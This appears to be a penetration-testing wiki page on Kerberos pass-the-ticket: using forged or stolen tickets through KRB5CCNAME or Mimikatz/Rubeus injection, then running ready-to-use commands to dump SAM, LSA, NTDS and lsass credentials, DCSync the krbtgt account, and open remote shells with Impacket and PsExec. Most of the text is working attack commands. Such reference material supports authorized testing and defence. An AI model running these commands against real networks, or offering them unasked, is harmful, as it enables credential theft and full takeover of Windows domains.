Overpass-the-hash, silver ticket and golden ticket attacks are used by attackers to obtain illegitimate tickets. A ticket (TGT or service ticket, forged or not) can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass-the-ticket.
On UNIX-like systems, the path to the .ccache file holding the ticket to use has to be referenced in the KRB5CCNAME environment variable: once a ticket is obtained or created, it needs to be referenced in that variable for it to be used by other tools.
On Windows, the ticket has to be injected in memory, for example with Mimikatz (which accepts both .kirbi and .ccache files):
# use a .kirbi file
kerberos::ptt $ticket_kirbi_file
# use a .ccache file
kerberos::ptt $ticket_ccache_file
or with Rubeus:
Rubeus.exe ptt /ticket:$ticket_kirbi_file
It is then possible to list the tickets in memory.
On Windows, once Kerberos tickets are injected, they can be used natively.
On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.
Impacket's secretsdump.py (Python) can extract credentials from the target with Kerberos authentication:
secretsdump.py -k $TARGET
CrackMapExec (Python) can do it on a set of targets:
crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds
Lsassy (Python) can dump credentials from the lsass process memory with a higher chance of success, as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS
On Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt account's credentials through DCSync:
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support:
psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'
CrackMapExec (Python) has the ability to do it on a set of targets:
crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami
On Windows, once the ticket is injected, it will natively be used when accessing a service, for example with PsExec:
.\PsExec.exe -accepteula \\$TARGET cmd